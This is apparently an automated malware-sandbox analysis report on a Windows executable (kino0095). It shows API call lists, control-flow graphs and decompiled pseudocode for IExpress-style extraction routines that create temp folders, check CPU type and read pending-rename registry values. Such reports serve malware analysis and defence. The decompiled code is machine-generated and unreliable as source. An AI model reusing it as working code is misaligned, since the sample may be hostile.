                                                                                                                                                                                                                                    • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 010B541F
                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 010B542B
                                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 010B5434
                                                                                                                                                                                                                                    • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 010B5452
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                                                    • API String ID: 1082909758-4044985724
                                                                                                                                                                                                                                    • Opcode ID: 023f32c80d5ede0a5537b19215be418a69f216213be1fb61f8e51b731f8b41ff
                                                                                                                                                                                                                                    • Instruction ID: 8538a2952ca30043fb2793308c3c95e367eeb0c587777fd52e0b4070bbd339af
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 023f32c80d5ede0a5537b19215be418a69f216213be1fb61f8e51b731f8b41ff
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 06110471701104B7E3209B269CC8FEF3A6DEBD5711F004169F6C6D3280DF7A894287A4
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B5467 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 101COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 522 10b5467-10b5484 523 10b548a-10b5490 call 10b53a1 522->523 524 10b551c-10b5528 call 10b1680 522->524 528 10b5495-10b5497 523->528 527 10b552d-10b5539 call 10b58c8 524->527 537 10b553b-10b5545 CreateDirectoryA 527->537 538 10b554d-10b5552 527->538 529 10b549d-10b54c0 call 10b1781 528->529 530 10b5581-10b5583 528->530 539 10b550c-10b551a call 10b658a 529->539 540 10b54c2-10b54d8 GetSystemInfo 529->540 533 10b558d-10b559d call 10b6ce0 530->533 542 10b5577-10b557c call 10b6285 537->542 543 10b5547 537->543 544 10b5585-10b558b 538->544 545 10b5554-10b5557 call 10b597d 538->545 539->527 546 10b54da-10b54dd 540->546 547 10b54fe 540->547 542->530 543->538 544->533 553 10b555c-10b555e 545->553 551 10b54df-10b54e2 546->551 552 10b54f7-10b54fc 546->552 554 10b5503-10b5507 call 10b658a 547->554 557 10b54f0-10b54f5 551->557 558 10b54e4-10b54e7 551->558 552->554 553->544 559 10b5560-10b5566 553->559 554->539 557->554 558->539 561 10b54e9-10b54ee 558->561 559->530 562 10b5568-10b5575 RemoveDirectoryA 559->562 561->554 562->530
                                                                                                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                                                                                                    			E010B5467(CHAR* __ecx, void* __edx, char* _a4) {
				signed int _v8;
				char _v268;
				struct _SYSTEM_INFO _v304;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t10;
				void* _t13;
				intOrPtr _t14;
				void* _t16;
				void* _t20;
				signed int _t26;
				void* _t28;
				void* _t29;
				CHAR* _t48;
				signed int _t49;
				intOrPtr _t61;

				_t10 =  *0x10b8004; // 0x72151d89
				_v8 = _t10 ^ _t49;
				_push(__ecx);
				if(__edx == 0) {
					_t48 = 0x10b91e4;
					_t42 = 0x104;
					E010B1680(0x10b91e4, 0x104);
					L14:
					_t13 = E010B58C8(_t48); // executed
					if(_t13 != 0) {
						L17:
						_t42 = _a4;
						if(_a4 == 0) {
							L23:
							 *0x10b9124 = 0;
							_t14 = 1;
							L24:
							return E010B6CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
						}
						_t16 = E010B597D(_t48, _t42, 1, 0); // executed
						if(_t16 != 0) {
							goto L23;
						}
						_t61 =  *0x10b8a20; // 0x0
						if(_t61 != 0) {
							 *0x10b8a20 = 0;
							RemoveDirectoryA(_t48);
						}
						L22:
						_t14 = 0;
						goto L24;
					}
					if(CreateDirectoryA(_t48, 0) == 0) {
						 *0x10b9124 = E010B6285();
						goto L22;
					}
					 *0x10b8a20 = 1;
					goto L17;
				}
				_t42 =  &_v268;
				_t20 = E010B53A1(__ecx,  &_v268); // executed
				if(_t20 == 0) {
					goto L22;
				}
				_push(__ecx);
				_t48 = 0x10b91e4;
				E010B1781(0x10b91e4, 0x104, __ecx,  &_v268);
				if(( *0x10b9a34 & 0x00000020) == 0) {
					L12:
					_t42 = 0x104;
					E010B658A(_t48, 0x104, 0x10b1140);
					goto L14;
				}
				GetSystemInfo( &_v304);
				_t26 = _v304.dwOemId & 0x0000ffff;
				if(_t26 == 0) {
					_push("i386");
					L11:
					E010B658A(_t48, 0x104);
					goto L12;
				}
				_t28 = _t26 - 1;
				if(_t28 == 0) {
					_push("mips");
					goto L11;
				}
				_t29 = _t28 - 1;
				if(_t29 == 0) {
					_push("alpha");
					goto L11;
				}
				if(_t29 != 1) {
					goto L12;
				}
				_push("ppc");
				goto L11;
			}




















                                                                                                                                                                                                                                    0x010b5472
                                                                                                                                                                                                                                    0x010b5479
                                                                                                                                                                                                                                    0x010b5481
                                                                                                                                                                                                                                    0x010b5484
                                                                                                                                                                                                                                    0x010b551c
                                                                                                                                                                                                                                    0x010b5521
                                                                                                                                                                                                                                    0x010b5528
                                                                                                                                                                                                                                    0x010b552d
                                                                                                                                                                                                                                    0x010b552f
                                                                                                                                                                                                                                    0x010b5539
                                                                                                                                                                                                                                    0x010b554d
                                                                                                                                                                                                                                    0x010b554d
                                                                                                                                                                                                                                    0x010b5552
                                                                                                                                                                                                                                    0x010b5585
                                                                                                                                                                                                                                    0x010b5585
                                                                                                                                                                                                                                    0x010b558b
                                                                                                                                                                                                                                    0x010b558d
                                                                                                                                                                                                                                    0x010b559d
                                                                                                                                                                                                                                    0x010b559d
                                                                                                                                                                                                                                    0x010b5557
                                                                                                                                                                                                                                    0x010b555e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5560
                                                                                                                                                                                                                                    0x010b5566
                                                                                                                                                                                                                                    0x010b5569
                                                                                                                                                                                                                                    0x010b556f
                                                                                                                                                                                                                                    0x010b556f
                                                                                                                                                                                                                                    0x010b5581
                                                                                                                                                                                                                                    0x010b5581
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5581
                                                                                                                                                                                                                                    0x010b5545
                                                                                                                                                                                                                                    0x010b557c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b557c
                                                                                                                                                                                                                                    0x010b5547
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5547
                                                                                                                                                                                                                                    0x010b548a
                                                                                                                                                                                                                                    0x010b5490
                                                                                                                                                                                                                                    0x010b5497
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b549d
                                                                                                                                                                                                                                    0x010b54ab
                                                                                                                                                                                                                                    0x010b54b4
                                                                                                                                                                                                                                    0x010b54c0
                                                                                                                                                                                                                                    0x010b550c
                                                                                                                                                                                                                                    0x010b5511
                                                                                                                                                                                                                                    0x010b5515
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5515
                                                                                                                                                                                                                                    0x010b54c9
                                                                                                                                                                                                                                    0x010b54d6
                                                                                                                                                                                                                                    0x010b54d8
                                                                                                                                                                                                                                    0x010b54fe
                                                                                                                                                                                                                                    0x010b5503
                                                                                                                                                                                                                                    0x010b5507
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5507
                                                                                                                                                                                                                                    0x010b54da
                                                                                                                                                                                                                                    0x010b54dd
                                                                                                                                                                                                                                    0x010b54f7
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b54f7
                                                                                                                                                                                                                                    0x010b54df
                                                                                                                                                                                                                                    0x010b54e2
                                                                                                                                                                                                                                    0x010b54f0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b54f0
                                                                                                                                                                                                                                    0x010b54e7
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b54e9
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 010B54C9
                                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 010B553D
                                                                                                                                                                                                                                    • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 010B556F
                                                                                                                                                                                                                                      • Part of subcall function 010B53A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 010B53FB
                                                                                                                                                                                                                                      • Part of subcall function 010B53A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 010B5402
                                                                                                                                                                                                                                      • Part of subcall function 010B53A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 010B541F
                                                                                                                                                                                                                                      • Part of subcall function 010B53A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 010B542B
                                                                                                                                                                                                                                      • Part of subcall function 010B53A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 010B5434
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                                                    • API String ID: 1979080616-3963195772
                                                                                                                                                                                                                                    • Opcode ID: b088c0b9517208ba70acd11f934139a8946444ec0cda07e052a885b4b8def173
                                                                                                                                                                                                                                    • Instruction ID: bbe374360fe8bbb8a30bc0545e93af4df2ccbfd0752b24a25a5286d5c7cf491e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b088c0b9517208ba70acd11f934139a8946444ec0cda07e052a885b4b8def173
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9B315BB0B002059BEB609F2EACE45FE77DFAB91645F0441EEA5C2D3244DB75CE018794
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B256D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 75registryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 563 10b256d-10b257d 564 10b2583-10b2589 563->564 565 10b2622-10b2627 call 10b24e0 563->565 567 10b258b 564->567 568 10b25e8-10b2607 RegOpenKeyExA 564->568 572 10b2629-10b262f 565->572 567->572 573 10b2591-10b2595 567->573 569 10b2609-10b2620 RegQueryInfoKeyA 568->569 570 10b25e3-10b25e6 568->570 574 10b25d1-10b25dd RegCloseKey 569->574 570->572 573->572 575 10b259b-10b25ba RegOpenKeyExA 573->575 574->570 575->570 576 10b25bc-10b25cb RegQueryValueExA 575->576 576->574
                                                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                                                    			E010B256D(signed int __ecx) {
				int _v8;
				void* _v12;
				signed int _t13;
				signed int _t19;
				long _t24;
				void* _t26;
				int _t31;
				void* _t34;

				_push(__ecx);
				_push(__ecx);
				_t13 = __ecx & 0x0000ffff;
				_t31 = 0;
				if(_t13 == 0) {
					_t31 = E010B24E0(_t26);
				} else {
					_t34 = _t13 - 1;
					if(_t34 == 0) {
						_v8 = 0;
						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
							goto L7;
						} else {
							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
							goto L6;
						}
						L12:
					} else {
						if(_t34 > 0 && __ecx <= 3) {
							_v8 = 0;
							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
							if(_t24 == 0) {
								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
								L6:
								asm("sbb eax, eax");
								_v8 = _v8 &  !( ~_t19);
								RegCloseKey(_v12); // executed
							}
							L7:
							_t31 = _v8;
						}
					}
				}
				return _t31;
				goto L12;
			}











                                                                                                                                                                                                                                    0x010b2572
                                                                                                                                                                                                                                    0x010b2573
                                                                                                                                                                                                                                    0x010b2575
                                                                                                                                                                                                                                    0x010b2578
                                                                                                                                                                                                                                    0x010b257d
                                                                                                                                                                                                                                    0x010b2627
                                                                                                                                                                                                                                    0x010b2583
                                                                                                                                                                                                                                    0x010b2586
                                                                                                                                                                                                                                    0x010b2589
                                                                                                                                                                                                                                    0x010b25eb
                                                                                                                                                                                                                                    0x010b2607
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b2609
                                                                                                                                                                                                                                    0x010b261a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b261a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b258b
                                                                                                                                                                                                                                    0x010b258b
                                                                                                                                                                                                                                    0x010b259e
                                                                                                                                                                                                                                    0x010b25b2
                                                                                                                                                                                                                                    0x010b25ba
                                                                                                                                                                                                                                    0x010b25cb
                                                                                                                                                                                                                                    0x010b25d1
                                                                                                                                                                                                                                    0x010b25d6
                                                                                                                                                                                                                                    0x010b25da
                                                                                                                                                                                                                                    0x010b25dd
                                                                                                                                                                                                                                    0x010b25dd
                                                                                                                                                                                                                                    0x010b25e3
                                                                                                                                                                                                                                    0x010b25e3
                                                                                                                                                                                                                                    0x010b25e3
                                                                                                                                                                                                                                    0x010b258b
                                                                                                                                                                                                                                    0x010b2589
                                                                                                                                                                                                                                    0x010b262f
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,010B4096,010B4096,?,010B1ED3,00000001,00000000,?,?,010B4137,?), ref: 010B25B2
                                                                                                                                                                                                                                    • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,010B4096,?,010B1ED3,00000001,00000000,?,?,010B4137,?,010B4096), ref: 010B25CB
                                                                                                                                                                                                                                    • RegCloseKey.KERNELBASE(?,?,010B1ED3,00000001,00000000,?,?,010B4137,?,010B4096), ref: 010B25DD
                                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,010B4096,010B4096,?,010B1ED3,00000001,00000000,?,?,010B4137,?), ref: 010B25FF
                                                                                                                                                                                                                                    • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,010B4096,00000000,00000000,00000000,00000000,?,010B1ED3,00000001,00000000), ref: 010B261A
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • System\CurrentControlSet\Control\Session Manager, xrefs: 010B25A8
                                                                                                                                                                                                                                    • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 010B25F5
                                                                                                                                                                                                                                    • PendingFileRenameOperations, xrefs: 010B25C3
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                                                    • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                                                    • API String ID: 2209512893-559176071
                                                                                                                                                                                                                                    • Opcode ID: ae4ad40d941e7b9069b34d71fe50b3386a21f97b206da39d84ad67badec261b7
                                                                                                                                                                                                                                    • Instruction ID: 6e1f150c7f1fce61c6bfd5fc1004726910698bea8c379a0965d33a4e708f5163
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ae4ad40d941e7b9069b34d71fe50b3386a21f97b206da39d84ad67badec261b7
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0D114235A52228FB9B309B969C89DFFBEBCEF057A1F104095B989A2000D6356A44D6A0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B6A60 Relevance: 13.6, APIs: 9, Instructions: 138sleepCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 577 10b6a60-10b6a91 call 10b7155 call 10b7208 GetStartupInfoW 583 10b6a93-10b6aa2 577->583 584 10b6abc-10b6abe 583->584 585 10b6aa4-10b6aa6 583->585 588 10b6abf-10b6ac5 584->588 586 10b6aa8-10b6aad 585->586 587 10b6aaf-10b6aba Sleep 585->587 586->588 587->583 589 10b6ad1-10b6ad7 588->589 590 10b6ac7-10b6acf _amsg_exit 588->590 592 10b6ad9-10b6ae9 call 10b6c3f 589->592 593 10b6b05 589->593 591 10b6b0b-10b6b11 590->591 594 10b6b2e-10b6b30 591->594 595 10b6b13-10b6b24 _initterm 591->595 599 10b6aee-10b6af2 592->599 593->591 597 10b6b3b-10b6b42 594->597 598 10b6b32-10b6b39 594->598 595->594 600 10b6b67-10b6b71 597->600 601 10b6b44-10b6b51 call 10b7060 597->601 598->597 599->591 602 10b6af4-10b6b00 599->602 604 10b6b74-10b6b79 600->604 601->600 610 10b6b53-10b6b65 601->610 605 10b6c39-10b6c3e call 10b724d 602->605 608 10b6b7b-10b6b7d 604->608 609 10b6bc5-10b6bc8 604->609 614 10b6b7f-10b6b81 608->614 615 10b6b94-10b6b98 608->615 612 10b6bca-10b6bd3 609->612 613 10b6bd6-10b6be3 _ismbblead 609->613 610->600 612->613 618 10b6be9-10b6bed 613->618 619 10b6be5-10b6be6 613->619 614->609 620 10b6b83-10b6b85 614->620 616 10b6b9a-10b6b9e 615->616 617 10b6ba0-10b6ba2 615->617 622 10b6ba3-10b6bbc call 10b2bfb 616->622 617->622 618->604 624 10b6c1e-10b6c25 618->624 619->618 620->615 621 10b6b87-10b6b8a 620->621 621->615 625 10b6b8c-10b6b92 621->625 622->624 630 10b6bbe-10b6bbf exit 622->630 626 10b6c32 624->626 627 10b6c27-10b6c2d _cexit 624->627 625->620 626->605 627->626 630->609
                                                                                                                                                                                                                                    C-Code - Quality: 51%
                                                                                                                                                                                                                                    			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t25;
				signed int _t26;
				signed int _t29;
				int _t30;
				signed int _t37;
				signed char _t41;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				signed int _t58;
				signed int _t59;
				intOrPtr* _t60;
				void* _t62;
				void* _t67;
				void* _t68;

				E010B7155();
				_push(0x58);
				_push(0x10b72b8);
				E010B7208(__ebx, __edi, __esi);
				 *(_t62 - 0x20) = 0;
				GetStartupInfoW(_t62 - 0x68);
				 *((intOrPtr*)(_t62 - 4)) = 0;
				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
				_t53 = 0;
				while(1) {
					asm("lock cmpxchg [edx], ecx");
					if(0 == 0) {
						break;
					}
					if(0 != _t56) {
						Sleep(0x3e8);
						continue;
					} else {
						_t58 = 1;
						_t53 = 1;
					}
					L7:
					_t67 =  *0x10b88b0 - _t58; // 0x2
					if(_t67 != 0) {
						__eflags =  *0x10b88b0; // 0x2
						if(__eflags != 0) {
							 *0x10b81e4 = _t58;
							goto L13;
						} else {
							 *0x10b88b0 = _t58;
							_t37 = E010B6C3F(0x10b10b8, 0x10b10c4); // executed
							__eflags = _t37;
							if(__eflags == 0) {
								goto L13;
							} else {
								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
								_t30 = 0xff;
							}
						}
					} else {
						_push(0x1f);
						L010B6FF4();
						L13:
						_t68 =  *0x10b88b0 - _t58; // 0x2
						if(_t68 == 0) {
							_push(0x10b10b4);
							_push(0x10b10ac);
							L010B7202();
							 *0x10b88b0 = 2;
						}
						if(_t53 == 0) {
							 *0x10b88ac = 0;
						}
						_t71 =  *0x10b88b4;
						if( *0x10b88b4 != 0 && E010B7060(_t71, 0x10b88b4) != 0) {
							_t60 =  *0x10b88b4; // 0x0
							 *0x10ba288(0, 2, 0);
							 *_t60();
						}
						_t25 = __imp___acmdln; // 0x74895b9c
						_t59 =  *_t25;
						 *(_t62 - 0x1c) = _t59;
						_t54 =  *(_t62 - 0x20);
						while(1) {
							_t41 =  *_t59;
							if(_t41 > 0x20) {
								goto L32;
							}
							if(_t41 != 0) {
								if(_t54 != 0) {
									goto L32;
								} else {
									while(_t41 != 0 && _t41 <= 0x20) {
										_t59 = _t59 + 1;
										 *(_t62 - 0x1c) = _t59;
										_t41 =  *_t59;
									}
								}
							}
							__eflags =  *(_t62 - 0x3c) & 0x00000001;
							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
								_t29 = 0xa;
							} else {
								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
							}
							_push(_t29);
							_t30 = E010B2BFB(0x10b0000, 0, _t59); // executed
							 *0x10b81e0 = _t30;
							__eflags =  *0x10b81f8;
							if( *0x10b81f8 == 0) {
								exit(_t30); // executed
								goto L32;
							}
							__eflags =  *0x10b81e4;
							if( *0x10b81e4 == 0) {
								__imp___cexit();
								_t30 =  *0x10b81e0; // 0x80070002
							}
							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
							goto L40;
							L32:
							__eflags = _t41 - 0x22;
							if(_t41 == 0x22) {
								__eflags = _t54;
								_t15 = _t54 == 0;
								__eflags = _t15;
								_t54 = 0 | _t15;
								 *(_t62 - 0x20) = _t54;
							}
							_t26 = _t41 & 0x000000ff;
							__imp___ismbblead(_t26);
							__eflags = _t26;
							if(_t26 != 0) {
								_t59 = _t59 + 1;
								__eflags = _t59;
								 *(_t62 - 0x1c) = _t59;
							}
							_t59 = _t59 + 1;
							 *(_t62 - 0x1c) = _t59;
						}
					}
					L40:
					return E010B724D(_t30);
				}
				_t58 = 1;
				__eflags = 1;
				goto L7;
			}


















                                                                                                                                                                                                                                    0x010b6a60
                                                                                                                                                                                                                                    0x010b6a6a
                                                                                                                                                                                                                                    0x010b6a6c
                                                                                                                                                                                                                                    0x010b6a71
                                                                                                                                                                                                                                    0x010b6a78
                                                                                                                                                                                                                                    0x010b6a7f
                                                                                                                                                                                                                                    0x010b6a85
                                                                                                                                                                                                                                    0x010b6a8e
                                                                                                                                                                                                                                    0x010b6a91
                                                                                                                                                                                                                                    0x010b6a93
                                                                                                                                                                                                                                    0x010b6a9c
                                                                                                                                                                                                                                    0x010b6aa2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b6aa6
                                                                                                                                                                                                                                    0x010b6ab4
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b6aa8
                                                                                                                                                                                                                                    0x010b6aaa
                                                                                                                                                                                                                                    0x010b6aab
                                                                                                                                                                                                                                    0x010b6aab
                                                                                                                                                                                                                                    0x010b6abf
                                                                                                                                                                                                                                    0x010b6abf
                                                                                                                                                                                                                                    0x010b6ac5
                                                                                                                                                                                                                                    0x010b6ad1
                                                                                                                                                                                                                                    0x010b6ad7
                                                                                                                                                                                                                                    0x010b6b05
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b6ad9
                                                                                                                                                                                                                                    0x010b6ad9
                                                                                                                                                                                                                                    0x010b6ae9
                                                                                                                                                                                                                                    0x010b6af0
                                                                                                                                                                                                                                    0x010b6af2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b6af4
                                                                                                                                                                                                                                    0x010b6af4
                                                                                                                                                                                                                                    0x010b6afb
                                                                                                                                                                                                                                    0x010b6afb
                                                                                                                                                                                                                                    0x010b6af2
                                                                                                                                                                                                                                    0x010b6ac7
                                                                                                                                                                                                                                    0x010b6ac7
                                                                                                                                                                                                                                    0x010b6ac9
                                                                                                                                                                                                                                    0x010b6b0b
                                                                                                                                                                                                                                    0x010b6b0b
                                                                                                                                                                                                                                    0x010b6b11
                                                                                                                                                                                                                                    0x010b6b13
                                                                                                                                                                                                                                    0x010b6b18
                                                                                                                                                                                                                                    0x010b6b1d
                                                                                                                                                                                                                                    0x010b6b24
                                                                                                                                                                                                                                    0x010b6b24
                                                                                                                                                                                                                                    0x010b6b30
                                                                                                                                                                                                                                    0x010b6b39
                                                                                                                                                                                                                                    0x010b6b39
                                                                                                                                                                                                                                    0x010b6b3b
                                                                                                                                                                                                                                    0x010b6b42
                                                                                                                                                                                                                                    0x010b6b57
                                                                                                                                                                                                                                    0x010b6b5f
                                                                                                                                                                                                                                    0x010b6b65
                                                                                                                                                                                                                                    0x010b6b65
                                                                                                                                                                                                                                    0x010b6b67
                                                                                                                                                                                                                                    0x010b6b6c
                                                                                                                                                                                                                                    0x010b6b6e
                                                                                                                                                                                                                                    0x010b6b71
                                                                                                                                                                                                                                    0x010b6b74
                                                                                                                                                                                                                                    0x010b6b74
                                                                                                                                                                                                                                    0x010b6b79
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
